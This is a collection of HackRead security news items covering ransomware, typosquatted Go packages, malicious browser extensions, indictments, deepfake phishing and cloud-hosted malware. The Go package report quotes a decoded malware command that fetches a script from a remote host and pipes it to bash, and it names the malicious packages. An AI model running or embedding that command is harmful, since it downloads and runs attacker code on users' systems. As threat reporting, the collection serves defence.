Tata Technologies hit by Hunters International ransomware attack. The group threatened to leak 1.4TB of data. Learn about…

Tata Technologies hit by Hunters International ransomware attack. The group threatened to leak 1.4TB of data. Learn about the extortion, potential data leak, and the connection to Hive ransomware.

Tata Technologies, a subsidiary of Indian multinational conglomerate Tata Motors, has reportedly been targeted by the ransomware group Hunters International. The attackers claim to have exfiltrated a massive 1.4 terabytes of data, encompassing over 730,000 files, from the engineering firm.  

This incident follows a mandatory disclosure made by Tata Motors to the Indian stock exchange in January 2025, where they reported a “ransomware incident” that had temporarily disrupted some of their IT services.

“The Company has become aware of a ransomware incident that has affected a few of our IT assets. As a precautionary measure, some of the IT services were suspended temporarily and have now been restored,” the disclosure read.

 While Tata Technologies acknowledged the incident at the time and stated that client delivery services remained unaffected, they did not disclose the identity of the attackers or the extent of the data breach.

Hunters International has now claimed responsibility for the attack. They are threatening to publicly release the stolen data unless a ransom is paid, although the specific amount demanded has not been disclosed.

Hunters International’s Extortion Page Lists Tata Technologies (Source: Bleeping Computer)

For your information, Hunters International is a notorious ransomware gang known for pursuing high-value targets. The group has a history of targeting organizations across various sectors, including automotive, finance, and healthcare. 

There is speculation that Hunters International may be a rebranded version of the now-defunct Hive ransomware gang, which was disrupted in a joint operation by the FBI, German, and Dutch law enforcement agencies in 2023 leading to the seizure of their site The Hive Leak..

This suspicion arises from the observation that both groups utilize the same strain of ransomware. Notably, Hive had previously targeted Tata Power in 2022, leaking stolen data after the company refused to pay the ransom.

The current situation with Tata Technologies remains unresolved. The company has not publicly commented on the ransom demand or confirmed whether they are in contact with the attackers. 

Nonetheless, the incident reignites concerns about the potential resurgence of the Hive ransomware gang under a new guise, raising questions about the effectiveness of law enforcement disruptions. It also reinstates the persistent threat of ransomware attacks and the vulnerability of even large multinational corporations to sophisticated cybercriminal groups.

 Moving forward, this situation highlights the critical need for organizations to prioritize advanced cybersecurity measures, incident response planning, and proactive threat intelligence to mitigate the impact of such attacks. The outcome of Tata Technologies’ response to this incident will undoubtedly serve as a case study for other organizations facing similar threats.

Camellia Chan, CEO and co-founder of X-PHY commented on the latest development stating, “The industrial sector was the most attacked sector in 2024. With the news that Hunters International has allegedly listed 1.4TB of Tata Technologies’ data, it’s clear this trend shows no signs of slowing down.”

“Due to the scale of their operations, industrials are perceived as having high ransom potential compared with other businesses. Take Tata Technologies as an example. Their customers are household automotive and aerospace engineering names like Jaguar, Airbus, Ford, and Honda which screams ‘cash’ for cybercriminals,” Camellia added.

“The only – and I mean only – way to stop this from happening is AI-first and multi-layer defence strategy that combines software and hardware solutions. This will proactively seek out threats before bad actors have a chance to gain access,” she explained.

Tata Technologies Hit by Hunters International Ransomware, 1.4TB Data at Risk

Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the…

Socket exposes a typosquatting campaign delivering malware to Linux and macOS systems via malicious Go packages. Discover the tactics used, including obfuscation and domain typosquatting, and learn how to stay safe.

Cybersecurity researchers at software supply chain security solutions provider, Socket, have uncovered a concerning new trend where malicious actors are increasingly targeting developers within the Go programming language network.

By employing a technique known as typosquatting, these attackers distribute malware disguised as legitimate Go packages, which are designed to install hidden malware loaders on Linux and macOS systems.

Socket’s investigation, shared with Hackread.com, shows that the attackers have published at least seven of these deceptive packages on the Go Module Mirror, a central repository for Go modules. The full list includes:

*   github.com/vainreboot/layout
*   github.com/utilizedsun/layout
*   github.com/thankfulmai/hypert
*   github.com/shallowmulti/hypert
*   github.com/ornatedoctrin/layout
*   github.com/shadowybulk/hypert
*   github.com/belatedplanet/hypert

These packages impersonate popular libraries, including “hypert” for testing HTTP API clients and “layout” for UI development.

Contextual Details of the Layout Package (Source: Socket)

The “hypert” package appears to be specifically aimed at developers in the financial sector.

Contextual Details of the Malicious Hypert Package (Source: Socket)

This malicious package contains concealed functions (such as qcJjJne()) that enable remote code execution. Upon being imported into a project, the malicious code silently downloads and executes a script from a remote server (alturastreeticu), which, in turn, installs an executable file that can potentially steal sensitive data or credentials.

To evade detection, the attackers employ various techniques. Such as, they utilize array-based string obfuscation to conceal the malicious commands within the code, making it difficult for traditional security tools to identify the threat. For instance, the command

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & is split into single-character strings and reconstructed using non-sequential indexing.

 Additionally, the malicious script incorporates a time delay, waiting for an hour before fetching the final payload, which helps them circumvent security measures that focus on immediate actions.

The malicious domains used in this campaign often resemble legitimate websites, particularly those related to financial institutions. This tactic, known as domain typosquatting, aims to deceive users by exploiting their trust in familiar names and brands.

The attackers are also reusing similar payloads and filenames across different domains and IP addresses, suggesting a coordinated and persistent effort.

The f0eee999 ELF file, for example, shows initial minimal malicious behaviour, such as reading /sys/kernel/mm/transparent\_hugepage/, aligning with a cryptominer or loader that remains dormant until conditions are met. This file, along with the a31546bf script, has been observed in Mads Hougesen’s research, “Rogue One: A Malware Story,” indicating potential connections and broader trends, researchers noted.

Socket’s research highlights the growing risks associated with software supply chain attacks, where malicious actors target developers and compromise the integrity of widely used libraries and packages.

Developers are advised to be vigilant when incorporating external packages into their projects. Real-time scanning tools and browser extensions, along with code audits, and careful dependency management practices, are crucial. Developers should also verify package integrity, monitor new repositories, and share indicators of compromise within the community.

Thomas Richards, Principal Consultant, Network and Red Team Practice Director at Black Duck, a Burlington, Massachusetts-based provider of application security solutions, commented on the latest development stating,

_“_This typosquatting attack is not a new attack vector, however, it still underscores how important it is to manage software risk and verify modules are legitimate before they are integrated into source code.  Verifying packages is usually done by signing them before they are added to a central repository. Any application being developed in Go should be reviewed immediately to be sure the malicious packages are not present, and systems have not been compromised._“_

Malware Infects Linux and macOS via Typosquatted Go Packages

Palo Alto, Singapore, 6th March 2025, CyberNewsWire

**Palo Alto, Singapore, March 6th, 2025, CyberNewsWire**

With recent attack disclosures like Browser Syncjacking and extension infostealers, browser extensions have become a primary security concern at many organizations. SquareX’s research team discovers a new class of malicious extensions that can impersonate any extension installed on the victim’s browser, including password managers and crypto wallets. These malicious extensions can morph themselves to have the exact same user interface, icons and text as the legitimate extension, making it an extremely convincing case for victims to enter their credentials and other sensitive information. This attack impacts most major browsers, including Chrome and Edge.

Polymorphic extensions work by exploiting the fact that most users interact with extensions via the pinned in the browser toolbar. The attack begins with the user installing the malicious extension, which disguises itself, for example, as an unassuming AI tool. To make the attack even more convincing, the extension performs the AI functionality as advertised and remains benign for a predetermined period of time. 

However, while all this is happening, the malicious extension starts figuring out what other extensions are installed in the victim’s browser. Once identified, the polymorphic extension completely changes its own appearance to look like the target, including the icon shown on the pinned toolbar. It can even disable the target extension temporarily, removing it from the pinned bar. Given that most users use these icons as a visual confirmation to inform which extension they are interacting with, changing the icon itself is likely sufficient to convince the average user that they are clicking on the legitimate extension. Even if the victim navigates to the extension dashboard, there is no obvious way to correlate the tools displayed there to the pinned icons. To avoid suspicion, the malicious extension can even temporarily disable the target extension such that they are the only ones with the target’s icon on the pinned tab. 

Critically, the polymorphic extension can impersonate any browser extension. For example, it can mimic popular password managers to trick victims into entering their master password. This password can then be used by the attacker to log on to the real password manager and access all credentials stored in the password vault. Similarly, the polymorphic extension can also mimic popular crypto wallets, allowing them to use the stolen credentials to authorize transactions to send cryptocurrency to the attacker. Other potential targets include developer tools and banking extensions that may provide the attacker unauthorized access to apps where sensitive data or financial assets are stored.

Furthermore, the attack only requires medium-risk permissions based on Chrome Store’s classification. Ironically, many of these permissions are used by password managers themselves, as well as other popular tools like ad blockers and page stylers, making it especially difficult for Chrome Store and security teams to identify malicious intent just by looking at the extension’s code.

> The founder of SquareX, Vivek Ramachandran cautions that “Browser extensions present a major risk to enterprises and users today. Unfortunately, most organizations have no way of auditing their current extension footprint and to check whether they are malicious. This further underscores the need for a browser native security solution like Browser Detection and Response, similar to what an EDR is to the operating system.”

These polymorphic extensions exploit existing features within Chrome to conduct the attack. As such, there is no software bug involved, and it cannot be patched. SquareX has written to Chrome for responsible disclosure, recommending banning or implementation of user alerts for any extension icon changes or abrupt changes in HTML, as these techniques can easily be leveraged by attackers to impersonate other extensions in a polymorphic attack. For enterprises, static extension analysis and permissions-based policies are no longer sufficient – it is critical to have a browser-native security tool that can dynamically analyze extension behaviour at runtime, including polymorphic tendencies of malicious extensions. 

For more information about polymorphic extensions, additional findings from this research are available at https://sqrx.com/polymorphic-extensions.

**About SquareX**

SquareX helps organizations detect, mitigate, and threat-hunt client-side web attacks happening against their users in real time, including defending against malicious extensions. In addition to the polymorphic attack, SquareX was also the first to discover and disclose multiple extension-based attacks, including Browser Syncjacking, the Chrome Store consent phishing attack leading to Cyberhaven’s breach and numerous other MV3-compliant malicious extensions revealed at DEF CON 32.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions. 

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

SquareX Unveils Polymorphic Extensions that Morph Infostealers into Any Browser Extension – Password Managers, Wallets at Risk

U.S. indicts 12 in Chinese Hacker-for-Hire Network tied to cyber attacks on governments & media. DOJ offers $10M reward for info on key suspects.

In a major coordinated operation, several U.S. law enforcement agencies have charged 12 Chinese nationals with a series of cyber attacks affecting government bodies, religious groups, media organizations, and international governments.

The indicted individuals include two officers from China’s public security service, employees of a Chinese technology firm, and members of an alleged hacking group known as APT27 which is also called Iron Tiger, Emissary Panda, LuckyMouse, TG-3390, and Bronze Union.

Officials from the Department of Justice, the FBI, the Naval Criminal Investigative Service, and the Departments of State and Treasury made the announcements, linking these cyber actors to operations directed by China’s state security agencies.

According to court documents, the hackers carried out attacks from around 2016 through 2023, compromising critical data through a series of computer intrusions. In many instances, the perpetrators earned significant sums by selling the stolen information to Chinese government agencies.

In its press release, the US Department of Justice stated that a key part of the investigation involves a private firm, i-Soon Information Technology. A federal court in Manhattan unsealed an indictment accusing eight employees from i-Soon along with two public security officers of breaching email accounts, cell phones, servers, and websites.

i-Soon’s penetration system and its software which bypasses Gmail multi-factor authentication (Screenshot: Hackread.com via DoJ)

The court has also authorized the seizure of the primary internet domain tied to this group, which has been linked to cyber activities including the targeting of U.S.-based critics, a U.S. religious organization, and several news outlets.

In parallel, separate indictments are targeting members of the hacking group APT27, who have been active since at least 2013. These charges detail efforts to infiltrate networks across a range of sectors; from technology firms and think tanks to law firms and universities.

Among the claims is a recent hack on the U.S. Treasury conducted late last year, where the use of rented virtual private servers played a key role. Investigators have seized digital infrastructure tied to these operations to dismantle the network. These are the names and job titles of the accused:

Ma Li (马丽), Technical Staff

Wang Zhe (王哲), Sales Director

Sheng Jing (盛晶), MPS Officer

Xu Liang (徐梁), Technical Staff

Wang Liyu (王立宇), MPS Officer

Wang Yan (王堰), Technical Staff

Zhou Weiwei (周伟伟), Technical Staff

Liang Guodong (梁国栋), Technical Staff

Wu Haibo (吴海波), Chief Executive Officer

Chen Cheng (陈诚), Chief Operating Officer

Law enforcement officials have also emphasized that the attackers were not just state-sponsored operatives but also worked as freelancers and through private companies. Their broad targeting has left many systems exposed to further cyber incidents, causing significant financial and reputational damage to affected organizations.

In response to these actions, U.S. authorities have issued attractive rewards for information leading to the identification or location of some of these cyber actors. One reward offer is up to $10 million for details on certain individuals linked to the hacking network, while another program offers up to $2 million for information on others operating from within China.

US Charges 12 in Chinese Hacker Network, Offers $10M Reward

YouTube CEO Neal Mohan was impersonated in a deepfake phishing scam. Learn about the attack, how to spot…

YouTube CEO Neal Mohan was impersonated in a deepfake phishing scam. Learn about the attack, how to spot the red flags, and how to protect your account from credential theft.

A new sophisticated phishing operation, leveraging artificial intelligence, has recently targeted YouTube content creators. Scammers have utilized deepfake technology to create a convincing video of YouTube’s CEO, Neal Mohan, delivering a fabricated announcement about changes to the platform’s monetization policies.

This video is privately shared with targeted users to steal their login credentials and install malware on their devices. The fraudulent scheme begins with an email, seemingly originating from an official YouTube address, notifying creators that a private video has been shared with them. The video itself features a remarkably realistic deepfake of Neal Mohan, mimicking his appearance, voice, and mannerisms to an alarming degree.

In the video, the AI-generated Mohan discusses alleged alterations to YouTube’s monetization, urging viewers to take specific actions. These actions typically involve clicking on links, entering login credentials on fake websites, or downloading software from untrusted sources.

The Fraudulent Video (Source: Reddit)

Upon compromising a user’s account, the attackers gain access to their YouTube channel. This access can then be exploited for various malicious purposes, including spreading misinformation, conducting further phishing attacks, or engaging in fraudulent activities.

YouTube has responded to this threat with an urgent warning to its creator community. The company has explicitly stated that it will never share important information or contact users through private videos. Furthermore, they emphasized that any private video claiming to be from YouTube, particularly those featuring its CEO, should be treated as a phishing scam.

“We’re aware that phishers have been sharing private videos to send false videos, including an AI-generated video of YouTube’s CEO Neal Mohan announcing changes in monetization. YouTube and its employees will never attempt to contact you or share information through a private video,” Google’s official announcement read.

“If a video is shared privately with you claiming to be from YouTube, the video is a phishing scam. Do not click these links as the videos will likely lead to phishing sites that can install malware or steal your credentials,” Rob from YouTube warned users.

AI deepfakes are a dangerous illusion created by sophisticated AI models trained on real footage and voice samples, exploiting people’s trust in public figures. Even tech-savvy individuals would struggle to distinguish them from real footage. This incident highlights that the sophistication of phishing attacks has increased, with deepfake technology being used to impersonate high-profile figures like YouTube’s CEO.

Cybercriminals exploit creators’ trust in official platform communications, creating believable deceptions. Content creators are encouraged to exercise caution and avoid downloading files from untrusted sources. If you receive the video, Google recommends following these steps to report it.

Max Gannon, Intelligence Manager at Cofense commented on the latest development stating, _“_Given that deepfakes have typically only been used in high-value targeted scams, it’s a surprise that threat actors are using it for such a broad attack. It’s concerning and potentially indicates a shift in the threat landscape where we can expect to see more deepfakes and other targeted attack methods being broadly applied to larger audiences._“_

_“_However, according to affected users posting about these fake YouTube emails on various social media platforms, the emails deliver malicious executables to steal session cookies and hijack YouTube accounts. Ultimately, the initial phishing hook may be shifting, but the best defence remains the same: training and awareness to detect suspect emails and not click on their links.”

1.  YouTube Channels Hacked to in Fake CS2 Giveaways Scam
2.  Malware in Fake Business Proposals Hits YouTube Creators
3.  Ukrainian News Channel Hacked to Run Zelensky’s Deepfake
4.  Scam Uses AI-Generated Images to Represent Fake Law Firm
5.  “Get Paid to Like Videos” YouTube Scam Leads to Empty Wallets

Hackers Deploy AI Deepfake of YouTube CEO in Credential Theft Scam

Microsoft warns that Chinese espionage group Silk Typhoon now exploits IT tools like remote management apps and cloud services to breach networks.

Cybersecurity researchers at Microsoft Threat Intelligence have observed that Silk Typhoon aka HAFNIUM, a Chinese espionage group known for its technical skill, is now using common IT solutions as a gateway into networks. Instead of solely relying on highly critical security vulnerabilities in major systems, the group is turning its attention to everyday tools like remote management applications and cloud services.

The shift in tactics aligns with changes adopted by other sophisticated espionage groups worldwide. This trend was first reported in May 2024, highlighting how Russian hackers are moving away from custom payloads in favour of readily available malware. A similar shift was observed in Iran, as reported in August 2024, where Iranian hackers were found collaborating with ransomware gangs in attacks against the United States.

**Exploiting Vulnerabilities**

Traditionally, Silk Typhoon took advantage of rare zero-day vulnerabilities by scanning for weak public-facing devices such as firewalls and VPNs. Some of its known exploitation includes CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. However, recent activity indicates that the group is now also targeting widely used solutions that many organizations rely on, including remote management tools and cloud applications.

While Microsoft confirms its own cloud services haven’t been directly targeted _yet_, Silk Typhoon is taking advantage of unpatched applications to breach systems. The group is known for misusing stolen keys and login details to compromise a targeted system and then using the access to reach into other systems, including those used by Microsoft particularly looking for information related to US government policy and legal matters.

****Changing Tactics****

The group’s change in tactics affects several sectors starting from government and healthcare to IT services and education. By attacking common IT tools, Silk Typhoon will take advantage of the fact that many organizations, including those with updated security measures, may overlook these everyday applications. Once inside, they will make use of various techniques to move across networks, access sensitive data, and even tamper with email and data storage services.

Therefore, Microsoft recommends a few key steps to secure yourself from the Silk Typhoon. First, keep all systems and software updated, as unpatched vulnerabilities are often the easiest entry points for attackers. Strong authentication practices, such as multi-factor authentication (MFA) and unique passwords, add an extra layer of security against unauthorized access.

For system administrators; monitoring network activity can also help detect unusual behaviour, like unexpected administrative changes, which could signal a breach. Additionally, organizations should carefully manage API keys and service credentials, restricting access wherever possible to prevent attackers from exploiting them.

Chinese Silk Typhoon Group Targets IT Tools for Network Breaches

London, United Kingdom, 5th March 2025, CyberNewsWire

**London, United Kingdom, March 5th, 2025, CyberNewsWire**

AI Soft has announced the upcoming public release of **Alli AI**, an advanced artificial intelligence-powered platform designed for content creation. Following the conclusion of a closed beta phase, the platform will soon be available with a free trial version, allowing users to explore its capabilities. Alli AI offers a range of tools for image enhancement, background modification, photo animation, video generation, and voice synthesis, catering to designers, photographers, marketers, and digital creators.

**Expanding AI Applications in Content Creation**

Alli AI functions as both an editor and a content generator, with applications spanning social media, digital marketing, and creative design. The technology has reportedly contributed to a growing volume of AI-generated content across platforms such as TikTok, Instagram, and X. Users have leveraged the tool for various applications, from animated imagery to advertising campaigns.

**Insights from Beta Testing**

The beta testing phase highlighted the platform’s appeal across multiple industries. Designers have used Alli AI to accelerate creative workflows and experiment with different artistic styles, while photographers have explored its animation and enhancement tools. Marketers have utilized the platform to streamline content production, and early adopters in other fields have experimented with its capabilities.

**Upcoming Public Launch**

Alli AI’s developers have announced plans for an upcoming public release, which will include a trial version. The platform is positioned as a tool for content creators seeking AI-driven enhancements for branding, digital media, and other projects.

**About Alli AI**

Alli AI is an AI-powered content creation platform developed by **AI Soft**. It offers tools for image enhancement, animation, background modification, video generation, and voice synthesis. Designed for professionals and casual users alike, Alli AI aims to streamline creative workflows across multiple industries, including marketing, photography, and design.

For more information, users can visit Alli AI’s official website or follow updates on X.

**Contact**

**AI Soft**  
**XS Trade**  
**\[email protected\]**  
**+447458196484**

Alli AI Announces Upcoming Public Launch of AI-Powered Content Creation Platform

Veriti Research reveals 40% of networks allow ‘any/any’ cloud access, exposing critical vulnerabilities. Learn how malware like XWorm…

Veriti Research reveals 40% of networks allow ‘any/any’ cloud access, exposing critical vulnerabilities. Learn how malware like XWorm and Sliver C2 exploit cloud misconfigurations.

Recent research conducted by Veriti shared with Hackread.com, sheds light on the alarming trend of cybercriminals exploiting cloud infrastructure for malicious purposes. The study reveals that cloud platforms are increasingly being used not only to host and deliver malware payloads but also to serve as command-and-control centres.  

A particularly concerning finding is that over 40% of networks permit unrestricted communication with at least one major cloud provider. This “any/any” configuration creates a significant security vulnerability, allowing attackers to easily exfiltrate data and deploy malware from seemingly trusted cloud sources. 

Veriti’s research highlighted specific instances of malware campaigns leveraging cloud storage. The most noteworthy instances include the XWorm malware’s utilization of Amazon Web Services (AWS) S3 storage to distribute its malicious executables. Similarly, a Remcos campaign employed malicious RTF files, exploiting known vulnerabilities, with payloads also hosted on AWS S3.

Beyond malware distribution, cloud platforms are being actively used as command-and-control (C2) servers. Various malware families, including Havoc, NetSupportManager, Unam Miner, Mythic, Pupy RAT, Caldera, HookBot and Brutal Ratel, were observed utilizing infrastructure from major cloud providers like AWS, Google Cloud, Microsoft Azure, and Alibaba Cloud for C2 operations.

Cloud services and the type of malware being spread through them (Screenshot credit: Veriti)

Researchers also documented malware strains commonly found in cloud-based attacks, such as Mirai and njRAT, further emphasizing the growing abuse of cloud environments. Another concerning development is the increasing use of Sliver C2, which is being weaponized by Advanced Persistent Threat (APT) groups for stealthy C2 operations and post-exploitation tactics, Veriti’s report revealed.

For your information, Sliver C2 is an open-source command-and-control framework, initially developed for penetration testing but is now being weaponized by threat actors. It is often used with Rust-based malware to establish backdoors and exploits zero-day vulnerabilities, including recent Ivanti Connect Secure and Policy Secure vulnerabilities.

Furthermore, the study revealed critical vulnerabilities affecting cloud-hosted services across AWS, Azure, and Alibaba Cloud. These vulnerabilities, identified by CVE numbers, highlight the need for organizations to adopt a proactive approach to cloud security. 

The increasing abuse of cloud services demands a shift towards a _security-first approach_ to protect against these evolving threats, researchers noted.

“Veriti Research’s findings emphasize the critical need for organizations to rethink cloud security strategies. The increasing abuse of cloud services for malware hosting, C2 operations, and exploitation calls for a proactive, security-first approach,” the report read.

This should include restricting “any/any” network rules, implementing cloud-native security solutions for threat monitoring, and enforcing stronger cloud security policies.

Hackers Exploit Cloud Misconfigurations to Spread Malware

Cofense uncovers new LinkedIn phishing scam delivering ConnectWise RAT. Learn how attackers bypass security with fake InMail emails…

Cofense uncovers new LinkedIn phishing scam delivering ConnectWise RAT. Learn how attackers bypass security with fake InMail emails and how to protect against this sophisticated phishing tactic.

Cybersecurity researchers at Cofense have recently uncovered a deceptive campaign that distributes malicious software using a spoofed LinkedIn email. This operation, detected by their Phishing Defense Center and Intelligence teams, diverges from typical LinkedIn-themed phishing attacks, which usually aim to steal user credentials or facilitate business email compromise. Instead, this campaign delivers a remote access trojan called ConnectWise RAT.

The fraudulent email is designed to mimic a notification for a LinkedIn InMail message, a feature that allows users to contact individuals outside of their immediate network. The email effectively leverages LinkedIn’s branding, convincingly creating legitimacy. However, careful examination reveals that the email uses an outdated template, reminiscent of LinkedIn’s design prior to its 2020 user interface and branding overhaul.

LinkedIn’s 2020 Branding (Source: Cofense)

The email’s narrative centres around a supposed sales director from a company requesting a product or service quote. This strategy aims to create a sense of urgency, prompting the recipient to respond quickly. However, the sender’s identity and the company mentioned are fabricated.

The profile picture used in the email belongs to a real individual, Cho So-young, who is the president of a Korean civil engineering organization, whereas the company name (DONGJIN Weidmüller Korea Ind) combines elements of two legitimate corporations, but this company does not exist.

Clicking the “Read More” or “Reply To” buttons embedded within the email triggers the download of the ConnectWise RAT installer. Interestingly, the email avoids the common tactic of directly prompting users to download or run a file. This subtle approach might be designed to bypass the suspicions of users who are trained to be wary of such direct requests.

Analysis of the email’s security headers reveals that it fails Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) authentication checks, indicating that the email was not sent from a legitimate LinkedIn server and was not digitally signed.

Despite these red flags, the email bypassed existing security measures, likely due to the Domain-based Message Authentication, Reporting & Conformance (DMARC) policy being configured to mark the email as spam rather than outright rejecting it.

This campaign has been active since at least May 2024, with the email template remaining consistent. However, whether earlier iterations of this campaign also delivered the ConnectWise RAT remains unconfirmed.

“This campaign was found to exist in the wild as far back as May 2024. While the email template has not changed since then, Cofense Intelligence was unable to confirm whether this campaign was used to deliver ConnectWise RAT in prior samples that were found via open-source intelligence,” researchers noted in the blog post.

Nevertheless, this campaign highlights the evolving tactics of cybercriminals and the persistent threat of sophisticated phishing attacks involving LinkedIn. Protection against such threats requires educating employees to carefully scrutinize email senders especially those requesting urgent actions, appropriately configuring email authentication protocols (SPF, DKIM, and DMARC), and ensuring your Secure Email Gateway (SEG) is configured to effectively filter and block suspicious emails.

LinkedIn Phishing Scam: Fake InMail Messages Spreading ConnectWise Trojan

Scammers are impersonating BianLian ransomware, and mailing fake ransom letters to businesses. Learn the red flags and how…

Scammers are impersonating BianLian ransomware, and mailing fake ransom letters to businesses. Learn the red flags and how to protect against this extortion scam.

GuidePoint Security’s Senior Threat Intelligence Analyst, Grayson North, has discovered a peculiar trend in the corporate sector in which executives at various organizations began receiving physical letters delivered via the US Postal Service.

In March 2025, the GuidePoint Research and Intelligence Team (GRIT) received reports of suspicious physical letters from the BianLian ransomware group, claiming that the recipient’s corporate IT network had been compromised and sensitive data had been stolen. The letters were delivered via mail from US addresses.

These senders demanded substantial ransom payments, ranging from $250,000 to $350,000, to a Bitcoin wallet address provided, with a threat of data leakage if payment was not received within ten days. The letter arrived with the following text:

“We no longer negotiate with victims: You have 10 days from the receipt of this letter to pay. If we are not paid on time, your data will be published and we will continue to collect data from your network and company. It is up to you to determine the cost of all of your company’s data being leaked to the public to abuse.”

The letters mimicked the format of traditional digital ransomware notes, including QR codes for easy Bitcoin transfers and Tor links to BianLian’s data leak site on the Dark Web. However, cybersecurity analysts at GuidePoint Security quickly identified numerous inconsistencies that cast doubt on the legitimacy of these claims.

Such as, the letters’ language was notably different from BianLian’s past ransom notes, displaying a level of polished English that was uncharacteristic. Though the provided Tor links did lead to BianLian’s legitimate data leak sites, these links are publicly known and easily accessible. The most glaring anomaly was the method of delivery since ransomware groups typically communicate digitally, and generally avoid using physical mail mediums.

Moreover, according to GRIT’s report, instead of standard threat actors’ practices, the senders refused to negotiate. The Bitcoin wallet addresses were newly generated and showed no previous association with any ransomware activity. Crucially, investigations revealed no evidence of network intrusions or data breaches in the organizations that received these letters.

The research team, hence, concluded that given the unusual delivery method, the language inconsistencies, the lack of intrusion evidence, and the fresh Bitcoin wallets all pointed to an attempt to impersonate BianLian for financial gain. The letters were marked “TIME SENSITIVE READ IMMEDIATELY” and had a return address in Boston.

The fake ransom letter used in the campaign (Via GRIT)

These aspects indicate that the letters were designed to create a sense of urgency and fear, exploiting the reputation of a known ransomware group. GRIT recommends organizations should educate employees on handling such threats and ensure network defences are up to date and no active alerts are present.

1.  Fake CrowdStrike Recruiters Distribute Malware
2.  Journalist Targeted in USB Drive Bombing Attack
3.  Hackers Call Employees to Steal VPN Data from US Firms
4.  Volcano Demon Ransomware Makes Phones Victim of Ransom
5.  Fake IT Calls Scam MS Teams Users into Installing Ransomware

Source

HackRead